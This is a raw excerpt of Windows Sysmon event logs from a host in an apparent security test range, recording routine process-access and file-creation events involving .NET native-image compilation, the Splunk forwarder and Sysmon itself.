13:49:47.135{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5103-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.135{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5103-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.135{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5103-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:47.104{59A5CD1D-91FB-6005-5003-00000000A301}3184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c70-0\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll2021-01-18 13:49:47.104 10341000x80000000000000007634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.057{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5003-00000000A301}3184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.042{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5003-00000000A301}3184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.042{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5003-00000000A301}3184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.010{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-4F03-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.010{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-4F03-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.010{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-4F03-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:46.995{59A5CD1D-91FA-6005-4E03-00000000A301}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13ac-0\Microsoft.GroupPolicy.Commands.dll2021-01-18 13:49:46.995 10341000x80000000000000007719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.948{59A5CD1D-91FC-6005-5F03-00000000A301}45444100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FC-6005-6003-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.885{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-6003-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.885{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FC-6005-6003-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91FC-6005-5F03-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-5F03-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91FC-6005-5F03-00000000A301}4544C:\Program 